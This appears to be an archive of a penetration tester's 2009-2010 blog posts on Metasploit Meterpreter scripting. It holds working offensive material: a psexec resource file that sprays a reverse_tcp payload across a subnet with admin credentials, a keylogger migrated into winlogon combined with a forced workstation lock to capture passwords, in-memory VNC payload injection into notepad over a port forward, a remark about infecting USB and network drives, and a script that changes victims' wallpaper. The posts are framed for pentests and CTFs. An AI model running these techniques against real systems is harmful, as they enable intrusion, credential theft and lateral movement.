
Entries in script (6)

Monday, Sep 13 2010

Am I an Admin? Railgun Script

When you first step on a machine, you want to determine quickly whether you are just a user or an administrator. Meterpreter doesn’t have a way to check this quickly. You could drop to a shell, list the members of the local “Administrators” group, list your own user’s groups, and correlate any groups shared between the two outputs. You could run ‘getsystem’ and see whether any technique other than Kitrap0d works. You could also just run ‘ps’ and notice that you can see ‘SYSTEM’ processes.

But I wanted a way to check a bunch of sessions all at once. So I wrote “AmIAdmin.rb”, which uses meterpreter’s railgun extension to execute the Shell32 function “IsUserAnAdmin”.

Since Shell32.dll isn’t included in railgun by default, we have to add it. After writing the script I decided to add some checks. These checks make sure that each piece the script needs (railgun itself, the DLL, the function) isn’t already loaded before loading it. It’s a good reference for doing this in the future.

(you can remove the print_status lines if you want the script to be quieter)

Here is the script for your consumption:

# Railgun only supports 32-bit targets at this point
if client.platform == "x64/win32"
        print_status "Railgun is currently not supported for x64 bit systems"
        raise Rex::Script::Completed
end

# Load the railgun extension unless it is already present in this session
if client.railgun.present? == true
        print_status "Railgun already loaded.. skipping"
else
        print_status "Loading Railgun"
        client.core.use("railgun")
end

# Shell32.dll is not in railgun's default DLL list, so register it once
if client.railgun.dll['shell32'] == nil
        print_status "Adding Shell32.dll"
        client.railgun.add_dll('shell32','shell32')
else
        print_status "Shell32 already loaded.. skipping"
end

# Register IsUserAnAdmin: returns a BOOL and takes no parameters
if client.railgun.shell32.functions['IsUserAnAdmin'] == nil
        print_status "Adding the IsUserAnAdmin function"
        client.railgun.add_function('shell32', 'IsUserAnAdmin', 'BOOL', [])
else
        print_status "IsUserAnAdmin already loaded.. skipping"
end

# Railgun returns a hash; the API's return value is under the "return" key
print_status "Running the IsUserAnAdmin function"
status = client.railgun.shell32.IsUserAnAdmin()

if status["return"] == true then
        print_status "You are an administrator"
else
        print_error "You are not an administrator"
end

Sunday, Sep 12 2010

Rapid fire PSEXEC for Metasploit

Exploit modules inside of metasploit don't have the ability to run on multiple hosts with one swing of the bat. So I created some code to facilitate that. It's really not much but there are some really juicy pieces of knowledge I learned on the way here.

The following is a resource file, but instead of just giving you something to download or straight copy and paste, I've broken it up into sections. Also take note of the "setg", which sets the variable globally so that I don't have to set it again inside of the psexec module.

 

use multi/handler
setg PAYLOAD windows/meterpreter/reverse_tcp
setg LHOST 192.168.1.114
setg LPORT 80
set ExitOnSession false

exploit -j -z

This first part, while nothing spectacular, sets up the multi/handler beforehand so that each run of the exploit module doesn't have to set up and tear down its own handler, which is much faster. The following is just the setup for the module.

use windows/smb/psexec
set SMBUser Administrator
set SMBPass password123

Here is where it gets interesting though. Windows systems want something in SMBDomain; if they aren't joined to a domain, they will accept pretty much anything here.

However if they are actually joined to a domain, you either have to have the computer name (which definitely won't play well with a scanner easily) or use domain credentials.

set SMBDomain .

The "." is something every Windows API programmer would know as it's really well documented, but certainly not every Metasploit user. What it means is basically localhost, since SMB won't take either localhost or 127.0.0.1.

Next up, we don't want each run of the exploit module to build the multi/handler and tear it down every single run. That's why we built it first and set DisablePayloadHandler inside of the psexec module.

set DisablePayloadHandler true

Resource files have been able to run blocks of Ruby in Metasploit since revision 8876. By wrapping code in the HTML-like <ruby> block identifier, you can use the power of Ruby combined with Rex (Metasploit's API) to do really cool stuff.

More setup, but this time for the ruby portion. Using Metasploit's RangeWalker, we can take all kinds of input, an IP, a CIDR range, and even a line separated file of IP addresses using the "file:" prefix.

<ruby>
require 'rex/socket/range_walker'
rhosts = "192.168.92.0/24"
iplist = Rex::Socket::RangeWalker.new(rhosts)
iplist.each do |rhost|

So, we've required RangeWalker, parsed the target specification with it, and started an 'each' loop over the resulting addresses.

The "self.run_single" function allows you to send commands like you were outside of the ruby block to msfconsole. We are setting the RHOST to each IP that RangeWalker parsed out, simple right?

self.run_single("set RHOST #{rhost}")
self.run_single("exploit -j -z")

end
</ruby>

That's it. We send each exploit module run to the background one at a time and tell msfconsole not to interact with it, using "-j -z" just as we did with multi/handler.

Now, if your credentials worked on any of the IPs, you'll have sessions waiting for you.

This can easily be extended with one more loop and a bit of shuffling to make it into an SMB brute-forcer that accepts hashes.

Hope you learned a few things. Oh, and just a caveat: this is NOT quiet or stealthy and will probably get you caught on a blackbox pentest, but it is really great for the smash-and-grab style of CTF competitions.

 

Wednesday, Jul 07 2010

Intro to RailGun: WIN API for Meterpreter

Back on June 13th, “Patrick HVE” released RAILGUN:

http://mail.metasploit.com/pipermail/framework/2010-June/006382.html

And it was merged into the Metasploit trunk with revisions 9709, 9710, 9711 and 9712:

http://www.metasploit.com/redmine/projects/framework/repository/revisions/9712

Basically what this allows you to do is make Windows API calls from Meterpreter without compiling your own DLL. It currently supports a number of Windows API dlls:

  • iphlpapi
  • ws2_32
  • kernel32
  • ntdll
  • user32
  • advapi32

(You can find out exactly what functions are available by default in the api.rb file)

It’s also very extensible: if it doesn’t have a DLL or function you need, you can add it yourself. You can read all about it in the manual:

./external/source/meterpreter/source/extensions/railgun/railgun_manual.pdf

Here are two examples where this comes in very handy:

List Drives:

The problem that I’ve had on a number of pentests is that you get shell, but from CMD or Meterpreter there is no good way to find all of the volumes (drives) attached.

 

  • net use – Shows you what Network drives are connected, but not physical ones
  • fsutil fsinfo drives – You must be an administrator to ride this train
  • fdisk /status – Only on OLD versions of DOS, not sure when this disappeared

 

But railgun solves this problem with a really short script:

 

# Load the Railgun plugin   Update: You no longer need this step
client.core.use("railgun")
# Make the API call to enum drive letters 
a = client.railgun.kernel32.GetLogicalDrives()["return"]
# Math magic to convert the binary to letters
drives = []
letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
(0..25).each do |i|
    test = letters[i,1]
    rem = a % (2**(i+1))
    if rem > 0
        drives << test
        a = a - rem
    end
end
print_line("Drives Available = #{drives.inspect}")

Output:
Drives Available = ["A", "C", "D", "P", "X"]

Save this as a meterpreter script and it’ll print every logical drive attached to the system even as a limited user (that the user can see).
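As an added example (not code from the original post), here is the same GetLogicalDrives bitmask decoding done with bit operations rather than the modulo loop, alongside a port of the post's loop so the two can be compared, plus the reverse mapping so everything can be checked offline without a live Meterpreter session. The function names and the sample mask are my own.

```ruby
# Bit i of the DWORD returned by kernel32!GetLogicalDrives is set when the
# drive letter ('A' + i) exists. Integer#[] reads a single bit in Ruby.
def drives_from_mask(mask)
  (0..25).select { |i| mask[i] == 1 }.map { |i| ('A'.ord + i).chr }
end

# Port of the post's "math magic" loop: peel off the lowest remaining bit
# with a modulo against 2**(i+1). Kept here to show it is equivalent.
def drives_from_mask_modulo(mask)
  a = mask
  drives = []
  letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
  (0..25).each do |i|
    rem = a % (2**(i + 1))
    if rem > 0
      drives << letters[i, 1]
      a -= rem
    end
  end
  drives
end

# Reverse direction: the mask a given set of letters would produce. Handy for
# building test values and for sanity-checking a decoder against known drives.
def mask_from_drives(letters)
  letters.map { |l| 1 << (l.upcase.ord - 'A'.ord) }.reduce(0, :|)
end

# Constructed sample matching the post's output: A, C, D, P and X present.
SAMPLE_MASK = mask_from_drives(%w[A C D P X])  # => 8421389

if __FILE__ == $0
  puts "Drives Available = #{drives_from_mask(SAMPLE_MASK).inspect}"
end
```

In a real Meterpreter script you would pass `client.railgun.kernel32.GetLogicalDrives()["return"]` into `drives_from_mask` in place of the constructed `SAMPLE_MASK`.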

Logical drives include: (hdd, network, mass storage, optical, etc). This opens up the doors to infecting USB sticks and network drives…

 

JEDI KEYLOGGING:

One of the problems with keylogging is that you never know when the person will log in. If you came in through a client-side exploit, they have probably already logged in, and you’re left hoping they log into a portal or some other password-protected site.

Railgun to the rescue again:

# Start the keylogger running in the background dumping keys every 15 seconds, attached to Winlogon
meterpreter > bgrun keylogrecorder -c 1 -t 15
[*] Executed Meterpreter with Job ID 0
meterpreter > [*]     winlogon.exe Process found, migrating into 640
[*] Migration Successful!!
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf3/logs/scripts/keylogrecorder/192.168.92.122_20100707.4539.txt
[*] Recording

# Drop to IRB to initialize railgun and lockout the workstation, forcing the user to use their credentials again.

meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client

>> client.core.use("railgun")
=> true
>> client.railgun.user32.LockWorkStation()
=> {"GetLastError"=>0, "return"=>true}
>> exit
meterpreter >

Set up a “tail -f” on the keylogger’s log file, and then kill the keylogger once you’ve gotten what you came for.

meterpreter > bglist
[*] Job 0: ["keylogrecorder", "-c", "1", "-t", "15"]
meterpreter > bgkill 0
[*] Killing background job 0...
meterpreter >

Hope you have fun with railgun and shoot me an email mubix@hak5.org or leave a comment if you have any other crazy uses for railgun.

Monday, Jun 28 2010

Set Wallpaper Meterpreter Script

Certainly nothing to fuss over, but I've had a fascination with setting my target's wallpaper as sort of a calling card for years now. I've been able to set the registry key (HKCU\Control Panel\Desktop\Wallpaper), but until recently I didn't know how to get it to refresh so that it displayed without forcing the user to log out...

First, and most important, is the selection of the wallpaper. This is my first selection:

 

 

But it has to be a BMP. So, I created:

metasploit_1024.bmp (2.3 MB)

Next, run: reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_MULTI_SZ /d "C:\metasploit_1024.bmp"

and finally the magic:

rundll32.exe user32.dll,UpdatePerUserSystemParameters

That's it. Run that and it'll refresh the settings and display the wallpaper in all of its glory. But I wouldn't be a metasploit dog if I didn't make it into a meterpreter script:

 

download: wallpaper.rb

it's definitely not ready to be in the trunk, but it works, just edit each of the options in the file to point at the bmp you want on the victim's wallpaper and it'll be there.

Todo:

[*] Make each parameter an option so there is no text editing involved

[*] Add the ability to convert other image types on the fly

[*] Figure out how to get the desktop color to refresh with the wallpaper

Tuesday, Dec 15 2009

Meterpreter tunneling and VNC revamped

So yesterday (December 14th, 2009) HD Moore posted a tweet with a pic of the new VNC meterpreter script that he wrote:

[Image: hdmoore_vncinject]

Looking at the script I noticed that it created a new connection (two connections outbound). Well it was the perfect excuse to take the newly refurbished portfwd command for a spin.

http://www.room362.com/scripts-and-programs/metasploit/vnc_oneport.rb

Or you can get it via the SVN at Revision 7872

By creating a bind payload instead of a reverse connect, we can have the payload listen locally on the remote host. Then with the portfwd command (just like on your home router) we forward a local port on our side to the bound port on the remote side's localhost, and connect to that freshly forwarded port as if we were doing everything on the box itself. The result is a new session and a nice, beautiful VNC window, all over the existing meterpreter connection.

Options:

 

meterpreter > run vnc_oneport -h

OPTIONS:
    -e <opt>  The process to run and inject into (default: notepad.exe)
    -h        This help menu
    -l <opt>  The local port to listen on via port forwarding (default: 5901)
    -p <opt>  The port on the remote host to bind VNC to (default: randomized)

meterpreter >

 

Example Run:

 

[*] Meterpreter session 1 opened (192.168.92.103:4444 -> 192.168.92.113:1038)
meterpreter > run vnc_oneport
[*] Creating a VNC stager: RHOST=127.0.0.1 LPORT=1207
[*] Host process notepad.exe has PID 532
[*] Allocated memory at address 0x00640000
[*] Writing the VNC stager into memory...
[*] Running Payload
[*] Creating a new thread within notepad.exe to run the VNC stager...
[*] Starting the port forwarding from 5901 => TARGET:1207
[*] Local TCP relay created: 0.0.0.0:5901 <-> 127.0.0.1:1207
meterpreter > [*] VNC Server session 2 opened (127.0.0.1:56893 -> 127.0.0.1:5901)
Connected to RFB server, using protocol version 3.3
No authentication needed
Desktop name "VNCShell [SYSTEM@WORKSTATION1] - Full Access"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using shared memory PutImage
Same machine: preferring raw encoding
ShmCleanup called
[*] VNC Server session 2 closed.
meterpreter >                        

Note:

The forwarded port does not close even if the meterpreter session is ended, so use the following command to close the forward:

 

meterpreter > portfwd delete -l 5901
[*] Successfully stopped TCP relay on 0.0.0.0:5901

meterpreter >      

 

 

(Note to BT4 users: do a `apt-get install vncviewer` before using any of the vnc payloads in Metasploit)

The script uses just one of the millions of ways you can leverage ‘portfwd’ in your endeavors. But where it gets interesting is the fact that the delivery method for the payload never touches disk. That magic is all credited to HD though. What happens is a new process is created (notepad by default) and the newly created VNC bind payload is injected into it. But the beauty is that it’s doing local connections via the port forwarding, so all you see in TCPView is:

Now it's definitely suspicious that Notepad has any connections at all, but you can use the option `-e` to provide any executable you wish, as long as it's in the path for the system. For examples, look at what's running naturally already.

Plus, you would probably not be using port 4444 for a meterpreter session. But what I wanted to demonstrate with this script is the power of both meterpreter, and port forwarding.

Now it's your turn to make it better. Take a look at the guts, see if anything will help you in your scripting.